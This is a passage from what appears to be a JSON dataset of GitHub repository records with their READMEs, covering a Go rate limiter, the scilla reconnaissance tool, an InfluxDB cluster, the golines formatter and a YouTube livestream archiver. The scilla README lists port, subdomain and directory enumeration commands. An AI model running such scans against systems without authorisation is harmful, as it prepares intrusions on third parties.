`mutatingwebhookconfiguration`.\n3. Check if the application pod has the annotation `sidecar-injector-webhook.morven.me/inject:\"yes\"`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-redis/redis_rate", "link": "https://github.com/go-redis/redis_rate", "tags": ["redis", "gcra", "rate-limiting", "leaky-bucket"], "stars": 552, "description": "Rate limiting for go-redis", "lang": "Go", "repo_lang": "", "readme": "# Rate limiting for go-redis\n\n[![Build Status](https://travis-ci.org/go-redis/redis_rate.svg?branch=master)](https://travis-ci.org/go-redis/redis_rate)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/go-redis/redis/v8)](https://pkg.go.dev/github.com/go-redis/redis_rate/v9)\n\n> :heart: [**Uptrace.dev** - distributed traces, logs, and errors in one place](https://uptrace.dev)\n\nThis package is based on [rwz/redis-gcra](https://github.com/rwz/redis-gcra) and implements\n[GCRA](https://en.wikipedia.org/wiki/Generic_cell_rate_algorithm) (aka leaky bucket) for rate\nlimiting based on Redis. 
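As a hedged sketch of the rest of the API (assuming a limiter constructed with `NewLimiter` as in the example further down, and field names as of `redis_rate/v9`; double-check against the package docs), a custom limit can also be built directly instead of using the `PerSecond`/`PerMinute`/`PerHour` helpers:\n\n```go\npackage redis_rate_test\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\t\"time\"\n\n\t\"github.com/go-redis/redis_rate/v9\"\n)\n\n// customLimit is a sketch: allow a burst of 20 with a sustained rate of 10 requests per minute.\nfunc customLimit(ctx context.Context, limiter *redis_rate.Limiter) {\n\tlimit := redis_rate.Limit{Rate: 10, Burst: 20, Period: time.Minute}\n\tres, err := limiter.Allow(ctx, \"project:123\", limit)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tif res.Allowed == 0 {\n\t\tfmt.Println(\"rate limited, retry in\", res.RetryAfter)\n\t\treturn\n\t}\n\tfmt.Println(\"allowed\", res.Allowed, \"remaining\", res.Remaining)\n}\n```\n\nUnder the hood the limiter state lives in Redis and is updated by a Lua script. 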
The code requires Redis version 3.2 or newer since it relies on\n[replicate_commands](https://redis.io/commands/eval#replicating-commands-instead-of-scripts)\nfeature.\n\n## Installation\n\nredis_rate supports 2 last Go versions and requires a Go version with\n[modules](https://github.com/golang/go/wiki/Modules) support. So make sure to initialize a Go\nmodule:\n\n```shell\ngo mod init github.com/my/repo\n```\n\nAnd then install redis\\_rate/v9 (note **_v9_** in the import; omitting it is a popular mistake):\n\n```shell\ngo get github.com/go-redis/redis_rate/v9\n```\n\n## Example\n\n```go\npackage redis_rate_test\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\n\t\"github.com/go-redis/redis/v8\"\n\t\"github.com/go-redis/redis_rate/v9\"\n)\n\nfunc ExampleNewLimiter() {\n\tctx := context.Background()\n\trdb := redis.NewClient(&redis.Options{\n\t\tAddr: \"localhost:6379\",\n\t})\n\t_ = rdb.FlushDB(ctx).Err()\n\n\tlimiter := redis_rate.NewLimiter(rdb)\n\tres, err := limiter.Allow(ctx, \"project:123\", redis_rate.PerSecond(10))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(\"allowed\", res.Allowed, \"remaining\", res.Remaining)\n\t// Output: allowed 1 remaining 9\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "edoardottt/scilla", "link": "https://github.com/edoardottt/scilla", "tags": ["hacking", "security", "information-retrieval", "pentesting", "hacking-tool", "penetration-testing", "enumeration", "security-tools", "recon", "ctf-tools", "network", "subdomain-scanner", "portscanner", "dns-enumeration", "port-enumeration", "information-gathering", "subdomains-enumeration", "directories-enumeration", "bugbounty", "reconnaissance"], "stars": 552, "description": "Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration", "lang": "Go", "repo_lang": "", "readme": "

\n\ud83c\udff4\u200d\u2620\ufe0f Information Gathering tool \ud83c\udff4\u200d\u2620\ufe0f - DNS / Subdomains / Ports / Directories enumeration\n==========\n\n(badges: go-report-card, workflows, ubuntu-build, win10-build, pr-welcome, maintenance, ask me anything, license-GPL3)\n\nCoded with \ud83d\udc99 by edoardottt\n\nShare on Twitter!\n\nPreview \u2022 Install \u2022 Get Started \u2022 Examples \u2022 Changelog \u2022 Contributing \u2022 License\n\nPreview :bar_chart:\n----------\n\n(preview GIF)\n
\n\nInstallation \ud83d\udce1\n----------\n\n### Building from source\n\nYou need [Go](https://golang.org/).\n\n- **Linux**\n\n - `git clone https://github.com/edoardottt/scilla.git`\n - `cd scilla`\n - `make linux` (to install)\n - Edit the `~/.config/scilla/keys.yaml` file if you want to use API keys\n - `make unlinux` (to uninstall)\n\n- **Windows** (executable works only in scilla folder. [Alias?](https://github.com/edoardottt/scilla/issues/10))\n\n - `git clone https://github.com/edoardottt/scilla.git`\n - `cd scilla`\n - `.\\make.bat windows` (to install)\n - Create a `keys.yaml` file if you want to use api keys \n - `.\\make.bat unwindows` (to uninstall)\n\n### Using Docker\n\n```shell\ndocker build -t scilla .\ndocker run scilla help\n```\n\nGet Started \ud83c\udf89\n----------\n\n`scilla help` prints the help in the command line.\n\n```\nusage: scilla subcommand { options }\n\n Available subcommands:\n - dns [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-plain Print only results]\n -target REQUIRED\n - port [-p or ports divided by comma]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-common scan common ports]\n [-plain Print only results]\n -target REQUIRED\n - subdomain [-w wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-i ignore status codes]\n [-c use also a web crawler]\n [-db use also a public database]\n [-plain Print only results]\n [-db -no-check Don't check status codes for subdomains]\n [-db -vt Use VirusTotal as subdomains source]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n [-dns Set DNS IP to resolve the subdomains]\n [-alive Check also if the subdomains are alive]\n -target REQUIRED\n - dir [-w wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-i ignore status codes]\n [-c use also a web crawler]\n [-plain Print only results]\n [-nr No follow redirects]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n -target REQUIRED\n - report [-p or ports divided by comma]\n [-ws subdomains wordlist]\n [-wd directories wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-id ignore status codes in directories scanning]\n [-is ignore status codes in subdomains scanning]\n [-cd use also a web crawler for directories scanning]\n [-cs use also a web crawler for subdomains scanning]\n [-db use also a public database for subdomains scanning]\n [-common scan common ports]\n [-nr No follow redirects]\n [-db -vt Use VirusTotal as subdomains source]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n [-dns Set DNS IP to resolve the subdomains]\n [-alive Check also if the subdomains are alive]\n -target REQUIRED\n - help\n - examples\n```\n\n\nExamples \ud83d\udca1\n----------\n\n- DNS enumeration:\n \n - `scilla dns -target target.domain`\n - `scilla dns -oj output -target target.domain`\n - `scilla dns -oh output -target target.domain`\n - `scilla dns -ot output -target target.domain`\n - `scilla dns -plain -target target.domain`\n\n- Subdomains enumeration:\n\n - `scilla subdomain -target target.domain`\n - `scilla subdomain -w wordlist.txt -target target.domain`\n - `scilla subdomain -oj output -target target.domain`\n - `scilla subdomain -oh output -target target.domain`\n - `scilla subdomain -ot output -target target.domain`\n - `scilla subdomain -i 400 -target target.domain`\n - `scilla subdomain -i 4** -target 
target.domain`\n - `scilla subdomain -c -target target.domain`\n - `scilla subdomain -db -target target.domain`\n - `scilla subdomain -plain -target target.domain`\n - `scilla subdomain -db -no-check -target target.domain`\n - `scilla subdomain -db -vt -target target.domain`\n - `scilla subdomain -ua \"CustomUA\" -target target.domain`\n - `scilla subdomain -rua -target target.domain`\n - `scilla subdomain -dns 8.8.8.8 -target target.domain`\n - `scilla subdomain -alive -target target.domain`\n\n- Directories enumeration:\n\n - `scilla dir -target target.domain`\n - `scilla dir -w wordlist.txt -target target.domain`\n - `scilla dir -oj output -target target.domain`\n - `scilla dir -oh output -target target.domain`\n - `scilla dir -ot output -target target.domain`\n - `scilla dir -i 500,401 -target target.domain`\n - `scilla dir -i 5**,401 -target target.domain`\n - `scilla dir -c -target target.domain`\n - `scilla dir -plain -target target.domain`\n - `scilla dir -nr -target target.domain`\n - `scilla dir -ua \"CustomUA\" -target target.domain`\n - `scilla dir -rua -target target.domain`\n\n- Ports enumeration:\n \n - Default (all ports, so 1-65635) `scilla port -target target.domain`\n - Specifying ports range `scilla port -p 20-90 -target target.domain`\n - Specifying starting port (until the last one) `scilla port -p 20- -target target.domain`\n - Specifying ending port (from the first one) `scilla port -p -90 -target target.domain`\n - Specifying single port `scilla port -p 80 -target target.domain`\n - Specifying output format (json)`scilla port -oj output -target target.domain`\n - Specifying output format (html)`scilla port -oh output -target target.domain`\n - Specifying output format (txt)`scilla port -ot output -target target.domain`\n - Specifying multiple ports `scilla port -p 21,25,80 -target target.domain`\n - Specifying common ports `scilla port -common -target target.domain`\n - Print only results `scilla port -plain -target target.domain`\n\n- Full report:\n \n - Default (all ports, so 1-65635) `scilla report -target target.domain`\n - Specifying ports range `scilla report -p 20-90 -target target.domain`\n - Specifying starting port (until the last one) `scilla report -p 20- -target target.domain`\n - Specifying ending port (from the first one) `scilla report -p -90 -target target.domain`\n - Specifying single port `scilla report -p 80 -target target.domain`\n - Specifying output format (json)`scilla report -oj output -target target.domain`\n - Specifying output format (html)`scilla report -oh output -target target.domain`\n - Specifying output format (txt)`scilla report -ot output -target target.domain`\n - Specifying directories wordlist `scilla report -wd dirs.txt -target target.domain`\n - Specifying subdomains wordlist `scilla report -ws subdomains.txt -target target.domain`\n - Specifying status codes to be ignored in directories scanning `scilla report -id 500,501,502 -target target.domain`\n - Specifying status codes to be ignored in subdomains scanning `scilla report -is 500,501,502 -target target.domain`\n - Specifying status codes classes to be ignored in directories scanning `scilla report -id 5**,4** -target target.domain`\n - Specifying status codes classes to be ignored in subdomains scanning `scilla report -is 5**,4** -target target.domain`\n - Use also a web crawler for directories enumeration `scilla report -cd -target target.domain`\n - Use also a web crawler for subdomains enumeration `scilla report -cs -target target.domain`\n - Use also a public 
database for subdomains enumeration `scilla report -db -target target.domain`\n - Specifying multiple ports `scilla report -p 21,25,80 -target target.domain`\n - Specifying common ports `scilla report -common -target target.domain`\n - No follow redirects `scilla report -nr -target target.domain`\n - Use VirusTotal as subdomains source `scilla report -db -vt -target target.domain`\n - Set the User Agent `scilla report -ua \"CustomUA\" -target target.domain`\n - Generate a random user agent for each request `scilla report -rua -target target.domain`\n - Set DNS IP to resolve the subdomains `scilla report -dns 8.8.8.8 -target target.domain`\n - Check also if the subdomains are alive `scilla report -alive -target target.domain`\n\nChangelog \ud83d\udccc\n-------\nDetailed changes for each release are documented in the [release notes](https://github.com/edoardottt/scilla/releases).\n\nContributing \ud83d\udee0\n-------\n\nJust open an [issue](https://github.com/edoardottt/scilla/issues) / [pull request](https://github.com/edoardottt/scilla/pulls).\n\nBefore opening a pull request, download [golangci-lint](https://golangci-lint.run/usage/install/) and run\n```bash\ngolangci-lint run\n```\nIf there aren't errors, go ahead :)\n\n**Help me building this!**\n\nSpecial thanks to: [danielmiessler](https://github.com/danielmiessler), [sonarSearch](https://github.com/cgboal/sonarsearch), [HackerTarget](https://hackertarget.com/), [BufferOverrun](http://dns.bufferover.run/), [Threatcrowd](https://www.threatcrowd.org/), [Crt.sh](https://crt.sh/), [VirusTotal](https://www.virustotal.com/), [tomnomnom](https://github.com/tomnomnom/assetfinder).\n\n**To do:**\n\n - [ ] Add more tests\n \n - [ ] Tor support\n \n - [ ] Proxy support\n\nIn the news \ud83d\udcf0\n-------\n\n- [Kali Linux Tutorials](https://kalilinuxtutorials.com/scilla/)\n- [GeeksForGeeks.org](https://www.geeksforgeeks.org/scilla-information-gathering-dns-subdomain-port-enumeration/)\n- [Brisk Infosec](https://www.briskinfosec.com/tooloftheday/toolofthedaydetail/Scilla)\n- [Kalitut](https://kalitut.com/scilla-nformation-gathering-tool/)\n \nLicense \ud83d\udcdd\n-------\n\nThis repository is under [GNU General Public License v3.0](https://github.com/edoardottt/scilla/blob/main/LICENSE). 
\n[edoardoottavianelli.it](https://www.edoardoottavianelli.it) to contact me.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chengshiwen/influxdb-cluster", "link": "https://github.com/chengshiwen/influxdb-cluster", "tags": ["influxdb", "clustering", "high-availability", "influxdb-enterprise", "influxdb-cluster"], "stars": 552, "description": "InfluxDB Cluster - Open Source Alternative to InfluxDB Enterprise", "lang": "Go", "repo_lang": "", "readme": "# InfluxDB Cluster\n\n[![CN doc](https://img.shields.io/badge/\u6587\u6863-\u4e2d\u6587\u7248-blue.svg)](https://github.com/chengshiwen/influxdb-cluster/wiki)\n[![EN doc](https://img.shields.io/badge/document-English-blue.svg)](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng)\n[![LICENSE](https://img.shields.io/github/license/chengshiwen/influxdb-cluster.svg)](https://github.com/chengshiwen/influxdb-cluster/blob/master/LICENSE)\n[![Releases](https://img.shields.io/github/v/release/chengshiwen/influxdb-cluster.svg)](https://github.com/chengshiwen/influxdb-cluster/releases)\n![GitHub stars](https://img.shields.io/github/stars/chengshiwen/influxdb-cluster.svg?label=github%20stars&logo=github)\n[![Docker pulls](https://img.shields.io/docker/pulls/chengshiwen/influxdb.svg)](https://hub.docker.com/r/chengshiwen/influxdb)\n\nInfluxDB Cluster - An Open-Source Distributed Time Series Database, Open Source Alternative to InfluxDB Enterprise\n\n## An Open-Source, Distributed, Time Series Database\n\nInfluxDB Cluster is an open source **time series database** with\n**no external dependencies**. It's useful for recording metrics,\nevents, and performing analytics.\n\nInfluxDB Cluster is inspired by [InfluxDB Enterprise](https://docs.influxdata.com/enterprise_influxdb/v1.8/), [InfluxDB v1.8.10](https://github.com/influxdata/influxdb/tree/v1.8.10) and [InfluxDB v0.11.1](https://github.com/influxdata/influxdb/tree/v0.11.1), aiming to replace InfluxDB Enterprise.\n\nInfluxDB Cluster is easy to maintain, and can be updated in real time with upstream [InfluxDB 1.x](https://github.com/influxdata/influxdb/tree/master-1.x).\n\n## Features\n\n* Built-in [HTTP API](https://docs.influxdata.com/influxdb/latest/guides/writing_data/) so you don't have to write any server side code to get up and running.\n* Data can be tagged, allowing very flexible querying.\n* SQL-like query language.\n* Clustering is supported out of the box, so that you can scale horizontally to handle your data. **Clustering is currently in production state.**\n* Simple to install and manage, and fast to get data in and out.\n* It aims to answer queries in real-time. That means every data point is\n indexed as it comes in and is immediately available in queries that\n should return in < 100ms.\n\n## Clustering\n\n> **Note**: The clustering of InfluxDB Cluster is exactly the same as that of InfluxDB Enterprise.\n\nPlease see: [Clustering in InfluxDB Enterprise](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/clustering/)\n\nArchitectural overview:\n\n![architecture.png](https://iili.io/Vw1XTB.png)\n\nNetwork overview:\n\n![architecture](https://docs.influxdata.com/img/enterprise/1-8-network-diagram.png)\n\n## Installation\n\nWe recommend installing InfluxDB Cluster using one of the [pre-built releases](https://github.com/chengshiwen/influxdb-cluster/releases).\n\nComplete the following steps to install an InfluxDB Cluster in your own environment:\n\n1. 
[Install InfluxDB Cluster meta nodes](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#meta-node-setup)\n2. [Install InfluxDB Cluster data nodes](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#data-node-setup)\n\n> **Note**: The installation of InfluxDB Cluster is exactly the same as that of InfluxDB Enterprise.\n\n## Docker Quickstart\n\nDownload [docker-compose.yml](./docker/quick/docker-compose.yml), then start 3 meta nodes and 2 data nodes by `docker-compose`:\n\n```\ndocker-compose up -d\ndocker exec -it influxdb-meta-01 bash\ninfluxd-ctl add-meta influxdb-meta-01:8091\ninfluxd-ctl add-meta influxdb-meta-02:8091\ninfluxd-ctl add-meta influxdb-meta-03:8091\ninfluxd-ctl add-data influxdb-data-01:8088\ninfluxd-ctl add-data influxdb-data-02:8088\ninfluxd-ctl show\n```\n\nStop and remove them when they are no longer in use:\n\n```\ndocker-compose down -v\n```\n\n## Getting Started\n\n### Create your first database\n\n```\ncurl -XPOST \"http://influxdb-data-01:8086/query\" --data-urlencode \"q=CREATE DATABASE mydb WITH REPLICATION 2\"\n```\n\n### Insert some data\n```\ncurl -XPOST \"http://influxdb-data-01:8086/write?db=mydb\" \\\n-d 'cpu,host=server01,region=uswest load=42 1434055562000000000'\n\ncurl -XPOST \"http://influxdb-data-02:8086/write?db=mydb&consistency=all\" \\\n-d 'cpu,host=server02,region=uswest load=78 1434055562000000000'\n\ncurl -XPOST \"http://influxdb-data-02:8086/write?db=mydb&consistency=quorum\" \\\n-d 'cpu,host=server03,region=useast load=15.4 1434055562000000000'\n```\n\n> **Note**: `consistency=[any,one,quorum,all]` sets the write consistency for the point. `consistency` is `one` if you do not specify consistency. See the [Insert some data / Write consistency](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#insert-some-data) for detailed descriptions of each consistency option.\n\n### Query for the data\n```\ncurl -G \"http://influxdb-data-02:8086/query?pretty=true\" --data-urlencode \"db=mydb\" \\\n--data-urlencode \"q=SELECT * FROM cpu WHERE host='server01' AND time < now() - 1d\"\n```\n\n### Analyze the data\n```\ncurl -G \"http://influxdb-data-02:8086/query?pretty=true\" --data-urlencode \"db=mydb\" \\\n--data-urlencode \"q=SELECT mean(load) FROM cpu WHERE region='uswest'\"\n```\n\n## Documentation\n\n* View the wiki: [English Document](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng) / [\u4e2d\u6587\u6587\u6863](https://github.com/chengshiwen/influxdb-cluster/wiki/Home).\n* Read more about the [design goals and motivations of the project](https://docs.influxdata.com/enterprise_influxdb/v1.8/).\n* Follow the [getting started guide](https://docs.influxdata.com/enterprise_influxdb/v1.8/introduction/getting-started/) to learn the basics in just a few minutes.\n* Learn more about [clustering](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/clustering/) and [glossary](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/glossary/).\n\n## Contributing\n\nIf you're feeling adventurous and want to contribute to InfluxDB Cluster, see our [CONTRIBUTING.md](./CONTRIBUTING.md) for info on how to make feature requests, build from source, and run tests.\n\n## Licensing\n\nSee [LICENSE](./LICENSE) and [DEPENDENCIES.md](./DEPENDENCIES.md).\n\n## Looking for Support?\n\n- Email: chengshiwen@apache.org\n- [GitHub Issues](https://github.com/chengshiwen/influxdb-cluster/issues)\n- [Community & Communication](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#community--communication) / 
[\u793e\u533a & \u4ea4\u6d41](https://github.com/chengshiwen/influxdb-cluster/wiki#\u793e\u533a--\u4ea4\u6d41)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "segmentio/golines", "link": "https://github.com/segmentio/golines", "tags": [], "stars": 552, "description": "A golang formatter that fixes long lines", "lang": "Go", "repo_lang": "", "readme": "[![Circle CI](https://circleci.com/gh/segmentio/golines.svg?style=svg&circle-token=b1d01d8b035ef0aa71ccd183580586a80cd85271)](https://circleci.com/gh/segmentio/golines)\n[![Go Report Card](https://goreportcard.com/badge/github.com/segmentio/golines)](https://goreportcard.com/report/github.com/segmentio/golines)\n[![GoDoc](https://godoc.org/github.com/segmentio/golines?status.svg)](https://godoc.org/github.com/segmentio/golines)\n[![Coverage](https://img.shields.io/badge/Go%20Coverage-84%25-brightgreen.svg?longCache=true&style=flat)](https://gocover.io/github.com/segmentio/golines?version=1.13.x)\n\n# golines\n\nGolines is a golang formatter that shortens long lines, in addition to all\nof the formatting fixes done by [`gofmt`](https://golang.org/cmd/gofmt/).\n\n## Motivation\n\nThe standard golang formatting tools (`gofmt`, `goimports`, etc.) are great, but\n[deliberately don't shorten long lines](https://github.com/golang/go/issues/11915); instead, this\nis an activity left to developers.\n\nWhile there are different tastes when it comes to line lengths in go, we've generally found\nthat very long lines are more difficult to read than their shortened alternatives. As an example:\n\n```go\nmyMap := map[string]string{\"first key\": \"first value\", \"second key\": \"second value\", \"third key\": \"third value\", \"fourth key\": \"fourth value\", \"fifth key\": \"fifth value\"}\n```\n\nvs.\n\n```go\nmyMap := map[string]string{\n\t\"first key\": \"first value\",\n\t\"second key\": \"second value\",\n\t\"third key\": \"third value\",\n\t\"fourth key\": \"fourth value\",\n\t\"fifth key\": \"fifth value\",\n}\n```\n\nWe built `golines` to give go developers the option to automatically shorten long lines, like\nthe one above, according to their preferences.\n\nMore background and technical details are available in\n[this blog post](https://yolken.net/blog/cleaner-go-code-golines).\n\n## Examples\n\nSee this [before](_fixtures/end_to_end.go) and [after](_fixtures/end_to_end__exp.go)\nview of a file with very long lines. More example pairs can be found in the\n[`_fixtures`](_fixtures) directory.\n\n## Version support\n\nThe latest version of `golines` requires golang 1.18 or newer due to generics-related dependencies.\nIf you need to use `golines` with an older version of go, install the tool from the `v0.9.0`\nrelease.\n\n## Usage\n\nFirst, install the tool. If you're using golang 1.18 or newer, run:\n\n```\ngo install github.com/segmentio/golines@latest\n```\n\nOtherwise, for older golang versions, run:\n\n```\ngo install github.com/segmentio/golines@v0.9.0\n```\n\nThen, run:\n\n```\ngolines [paths to format]\n```\n\nThe paths can be either directories or individual files. If no paths are\nprovided, then input is taken from `stdin` (as with `gofmt`).\n\nBy default, the results are printed to `stdout`. To overwrite the existing\nfiles in place, use the `-w` flag.\n\n## Options\n\nSome other options are described in the sections below. 
Run `golines --help` to see\nall available flags and settings.\n\n#### Line length settings\n\nBy default, the tool tries to shorten lines that are longer than 100 columns\nand assumes that 1 tab = 4 columns. The latter can be changed via the\n`-m` and `-t` flags respectively.\n\n#### Dry-run mode\n\nRunning the tool with the `--dry-run` flag will show pretty, git-style diffs.\n\n#### Comment shortening\n\nShortening long comment lines is harder than shortening code because comments can\nhave arbitrary structure and format. `golines` includes some basic\nlogic for shortening single-line (i.e., `//`-prefixed) comments, but this is turned\noff by default since the quality isn't great. To enable this feature anyway, run\nwith the `--shorten-comments` flag.\n\n#### Custom formatters\n\nBy default, the tool will use [`goimports`](https://godoc.org/golang.org/x/tools/cmd/goimports) as\nthe base formatter (if found), otherwise it will revert to `gofmt`. An explicit formatter can be\nset via the `--base-formatter` flag; the command provided here should accept its input via\n`stdin` and write its output to `stdout`.\n\n#### Generated files\n\nBy default, the tool will not format any files that look like they're generated. If you\nwant to reformat these too, run with the `--no-ignore-generated` flag.\n\n#### Chained method splitting\n\nThere are several possible ways to split lines that are part of\n[method chains](https://en.wikipedia.org/wiki/Method_chaining). The original\napproach taken by `golines` was to split on the args, e.g.:\n\n```go\nmyObj.Method(\n\targ1,\n\targ2,\n\targ3,\n).AnotherMethod(\n\targ1,\n\targ2,\n).AThirdMethod(\n\targ1,\n\targ2,\n)\n```\n\nStarting in version 0.3.0, the tool now splits on the dots by default, e.g.:\n\n```go\nmyObj.Method(arg1, arg2, arg3).\n\tAnotherMethod(arg1, arg2).\n\tAThirdMethod(arg1, arg2)\n```\n\nThe original behavior can be used by running the tool with the `--no-chain-split-dots`\nflag.\n\n#### Struct tag reformatting\n\nIn addition to shortening long lines, the tool also aligns struct tag keys; see the\nassociated [before](_fixtures/struct_tags.go) and [after](_fixtures/struct_tags__exp.go)\nexamples in the `_fixtures` directory. To turn this behavior off, run with `--no-reformat-tags`.\n\n## Developer Tooling Integration\n\n### vim-go\n\nAdd the following lines to your vimrc, substituting `128` with your preferred line length:\n\n```vim\nlet g:go_fmt_command = \"golines\"\nlet g:go_fmt_options = {\n \\ 'golines': '-m 128',\n \\ }\n```\n\n### Visual Studio Code\n\n1. Install the [Run on Save](https://marketplace.visualstudio.com/items?itemName=emeraldwalk.RunOnSave) extension\n2. Go into the VSCode settings menu, scroll down to the section for the \"Run on Save\"\n extension, click the \"Edit in settings.json\" link\n3. Set the `emeraldwalk.runonsave` key as follows (adding other flags to the `golines`\n command as desired):\n\n```\n \"emeraldwalk.runonsave\": {\n \"commands\": [\n {\n \"match\": \"\\\\.go$\",\n \"cmd\": \"golines ${file} -w\"\n }\n ]\n }\n```\n\n4. Save the settings and restart VSCode\n\n### Goland\n\n1. Go into the Goland settings and click \"Tools\" -> \"File Watchers\" then click the plus to create a new file watcher\n2. Set the following properties and confirm by clicking OK:\n - __Name:__ `golines`\n - __File type:__ `Go files`\n - __Scope:__ `Project Files`\n - __Program:__ `golines`\n - __Arguments:__ `$FilePath$ -w`\n - __Output paths to refresh:__ `$FilePath$`\n3. 
Activate your newly created file watcher in the Goland settings under \"Tools\" -> \"Actions on save\"\n\n### Others\n\nComing soon.\n\n## How It Works\n\nFor each input source file, `golines` runs through the following process:\n\n1. Read the file, break it into lines\n2. Add a specially-formatted annotation (comment) to each line that's longer\n than the configured maximum\n3. Use [Dave Brophy's](https://github.com/dave) excellent\n [decorated syntax tree](https://github.com/dave/dst) library to parse the code\n plus added annotations\n4. Do a depth-first traversal of the resulting tree, looking for nodes\n that have an annotation on them\n5. If a node is part of a line that's too long, shorten it by altering\n the newlines around the node and/or its children\n6. Repeat steps 2-5 until no more shortening can be done\n7. Run the base formatter (e.g., `gofmt`) over the results, write these to either\n `stdout` or the source file\n\nSee [this blog post](https://yolken.net/blog/cleaner-go-code-golines) for more technical details.\n\n## Limitations\n\nThe tool has been tested on a variety of inputs, but it's not perfect. Among\nother examples, the handling of long lines in comments could be improved. If you see\nanything particularly egregious, please report via an issue.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Kethsar/ytarchive", "link": "https://github.com/Kethsar/ytarchive", "tags": [], "stars": 551, "description": "Garbage Youtube livestream downloader", "lang": "Go", "repo_lang": "", "readme": "# ytarchive\n\nAttempt to archive a given Youtube livestream from the start. This is most useful for streams that have already started and you want to download, but can also be used to wait for a scheduled stream and start downloading as soon as it starts. If you want to download a VOD, I recommend [yt-dlp](https://github.com/yt-dlp/yt-dlp), which is an actively maintained fork of youtube-dl with more features.\n\nA [WebUI front-end](https://github.com/lekoOwO/ytarchive-ui) was created by leko, if that's something you want. Note that I do not use this myself and cannot comment on how well it works or looks, but it could be useful if you want to set up downloading on a remote server, or make a service out of it.\n\n## Dependencies\n\n- [FFmpeg](https://ffmpeg.org/) needs to be installed to mux the final file.\n\n## Installation\n\nDownload the latest pre-release from [the releases page](https://github.com/Kethsar/ytarchive/releases)\n\nIf you use [Homebrew](https://brew.sh), you can install it by running\n\n```shell\nbrew install danirukun/ytarchive/ytarchive\n```\n\nAlternatively, if you have Go properly installed and set up, run `go install github.com/Kethsar/ytarchive@master`\n\n`@master` is required because of some bullshit caching Go package proxies do. Should have used Rust...\n\n## Usage\n\n```\nusage: ytarchive [OPTIONS] [url] [quality]\n\n\t[url] is a youtube livestream URL. If not provided, you will be\n\tprompted to enter one.\n\n\t[quality] is a slash-delimited list of video qualities you want\n\tto be selected for download, from most to least wanted. If not\n\tprovided, you will be prompted for one, with a list of available\n\tqualities to choose from. 
The following values are valid:\n\taudio_only, 144p, 240p, 360p, 480p, 720p, 720p60, 1080p, 1080p60, 1440p, 1440p60, 2160p, 2160p60, best\n\nOptions:\n\t-h\n\t--help\n\t\tShow this help message.\n\n\t-4\n\t--ipv4\n\t\tMake all connections using IPv4.\n\n\t-6\n\t--ipv6\n\t\tMake all connections using IPv6.\n\n\t--add-metadata\n\t\tWrite some basic metadata information to the final file.\n\n\t--audio-url GOOGLEVIDEO_URL\n\t\tPass in the given url as the audio fragment url. Must be a\n\t\tGoogle Video url with an itag parameter of 140.\n\n\t-c\n\t--cookies COOKIES_FILE\n\t\tGive a cookies.txt file that has your youtube cookies. Allows\n\t\tthe script to access members-only content if you are a member\n\t\tfor the given stream's user. Must be netscape cookie format.\n\n\t--debug\n\t\tPrint a lot of extra information.\n\n\t--error\n\t\tPrint only errors and general information.\n\n\t--ffmpeg-path FFMPEG_PATH\n\t\tSet a specific ffmpeg location, including program name.\n\t\te.g. \"C:\\ffmpeg\\ffmpeg.exe\" or \"/opt/ffmpeg/ffmpeg\"\n\n\t--h264\n\t\tOnly download h264 video, skipping VP9 if it would have been used.\n\n\t-k\n\t--keep-ts-files\n\t\tKeep the final stream audio and video files after muxing them\n\t\tinstead of deleting them.\n\n\t--merge\n\t\tAutomatically run the ffmpeg command for the downloaded streams\n\t\twhen sigint is received. You will be prompted otherwise.\n\n\t--metadata KEY=VALUE\n\t\tIf writing metadata, overwrite/add metadata key-value entry.\n\t\tKEY is a metadata key that ffmpeg recognizes. If invalid, ffmpeg may ignore it or error.\n\t\tVALUE is a format template. If empty string (''), omit writing metadata for the key.\n\t\tSee FORMAT TEMPLATE OPTIONS below for a list of available format keys.\n\t\tCan be used multiple times.\n\n\t--mkv\n\t\tMux the final file into an mkv container instead of an mp4 container.\n\t\tIgnored when downloading audio only.\n\n\t--monitor-channel\n\t\tContinually monitor a channel for streams. Requires using a /live URL.\n\t\tThis will go back to checking for a stream after it finishes downloading\n\t\tthe current one. Implies '-r 60 --merge' unless set separately. Minimum\n\t\t30 second wait time, 60 or more recommended. Using 'best' for quality or\n\t\tsetting a decently exhaustive list recommended to prevent waiting for\n\t\tinput if selected quality is not available for certain streams.\n\t\tBe careful to monitor your disk usage when using this to avoid filling\n\t\tyour drive while away.\n\n\t--no-audio\n\t\tDo not download the audio stream\n\n\t--no-frag-files\n\t\tKeep fragment data in memory instead of writing to an intermediate file.\n\t\tThis has the possibility to drastically increase RAM usage if a fragment\n\t\tdownloads particularly slowly as more fragments after it finish first.\n\t\tThis is only an 